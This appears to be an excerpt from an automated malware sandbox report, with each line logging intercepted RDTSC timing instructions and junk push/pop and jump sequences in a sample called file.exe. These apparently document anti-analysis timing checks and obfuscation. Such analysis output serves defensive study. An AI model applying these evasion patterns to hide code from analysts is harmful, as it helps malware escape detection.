                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC695 second address: CAC699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC699 second address: CAC6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC6B0 second address: CAC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E798Dh 0x00000009 jl 00007F68950E7986h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2DF2 second address: CB2DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2DF8 second address: CB2DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2DFC second address: CB2E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2E02 second address: CB2E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F68950E7986h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2E12 second address: CB2E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25B24 second address: C25B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25B2A second address: C25B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25B2F second address: C25B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F68950E7986h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1B0E second address: CB1B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F68950EC3BDh 0x00000012 jl 00007F68950EC3B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C5F9 second address: C6C5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB69CF second address: CB69D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6B55 second address: CB6B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6CB7 second address: CB6CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6F6E second address: CB6F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6F74 second address: CB6F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F68950EC3BEh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jno 00007F68950EC3B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6F97 second address: CB6FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F68950E7986h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6FA1 second address: CB6FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F68950EC3BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA8A5 second address: CBA8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAA4B second address: CBAA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F68950EC3BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAA5D second address: CBAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7999h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jg 00007F68950E7986h 0x00000013 jmp 00007F68950E7991h 0x00000018 je 00007F68950E7986h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAAA0 second address: CBAAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAAA4 second address: CBAAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC1A second address: CBAC22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC22 second address: CBAC43 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950E798Ch 0x00000008 push esi 0x00000009 jc 00007F68950E7986h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC43 second address: CBAC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F68950EC3B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC52 second address: CBAC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7997h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55C8 second address: CC55DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007F68950EC3B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55DA second address: CC55DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55DE second address: CC55E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC55E7 second address: CC55F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3664 second address: CC3673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3673 second address: CC3679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3679 second address: CC36B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F68950EC3C5h 0x0000000c jmp 00007F68950EC3C7h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC37E4 second address: CC37E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC37E8 second address: CC380F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C8h 0x00000007 jo 00007F68950EC3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC380F second address: CC3815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A96 second address: CC3A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A9C second address: CC3AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3AA0 second address: CC3AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F68950EC3BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3AC0 second address: CC3AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D6A second address: CC3D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D70 second address: CC3D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F68950E798Ah 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D84 second address: CC3D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F68950EC3BFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3D9A second address: CC3D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC404B second address: CC4051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4051 second address: CC407E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F68950E7990h 0x0000000b jmp 00007F68950E7997h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC407E second address: CC40B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F68950EC3C3h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F68950EC3BAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F68950EC3B6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC40B4 second address: CC40B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC40B8 second address: CC40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC43E0 second address: CC43E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC43E6 second address: CC43F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F68950EC3B6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC46B4 second address: CC46C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC46C0 second address: CC46C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC49E3 second address: CC49F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68950E7988h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F68950E7992h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC49F5 second address: CC4A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F68950EC3B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F68950EC3BDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CEB second address: CC4CF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4CF1 second address: CC4D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4FFF second address: CC500A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC52FB second address: CC5322 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950EC3B6h 0x00000008 jbe 00007F68950EC3B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F68950EC3BFh 0x00000017 jg 00007F68950EC3B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5322 second address: CC5328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5328 second address: CC532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6BB1 second address: CC6BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA97E second address: CCA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F68950EC3BCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA98A second address: CCA994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA994 second address: CCA998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9C4C second address: CC9C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7996h 0x00000007 pushad 0x00000008 jc 00007F68950E7986h 0x0000000e je 00007F68950E7986h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9DAF second address: CC9DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 ja 00007F68950EC3C2h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA061 second address: CCA093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E798Eh 0x00000009 popad 0x0000000a push ebx 0x0000000b jno 00007F68950E7986h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 jne 00007F68950E7998h 0x0000001b js 00007F68950E7992h 0x00000021 je 00007F68950E7986h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA1C9 second address: CCA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F68950EC3C1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA369 second address: CCA36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA49C second address: CCA4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F68950EC3B6h 0x00000016 popad 0x00000017 js 00007F68950EC3BCh 0x0000001d jp 00007F68950EC3B6h 0x00000023 pushad 0x00000024 je 00007F68950EC3B6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA69B second address: CCA69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B2E second address: CD6B36 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B36 second address: CD6B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F68950E7986h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B42 second address: CD6B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F51 second address: CD6F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F55 second address: CD6F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F5B second address: CD6F6E instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950E798Eh 0x00000008 jnp 00007F68950E7986h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F6E second address: CD6F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD721C second address: CD7221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7221 second address: CD7227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7227 second address: CD724A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E7993h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007F68950E7986h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7C57 second address: CD7C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD83F8 second address: CD841C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F68950E7995h 0x0000000b popad 0x0000000c jp 00007F68950E7988h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD841C second address: CD843E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950EC3BEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F68950EC3BBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD843E second address: CD8455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F68950E798Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8455 second address: CD845B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD62B5 second address: CD62C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F68950E7988h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFF5 second address: CDDFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDFFF second address: CDE003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FE5 second address: CE3FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FEA second address: CE3FEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3FEF second address: CE4015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F68950EC3BCh 0x0000000b jg 00007F68950EC3B6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F68950EC3C1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECF21 second address: CECF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F68950E798Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007F68950E7986h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
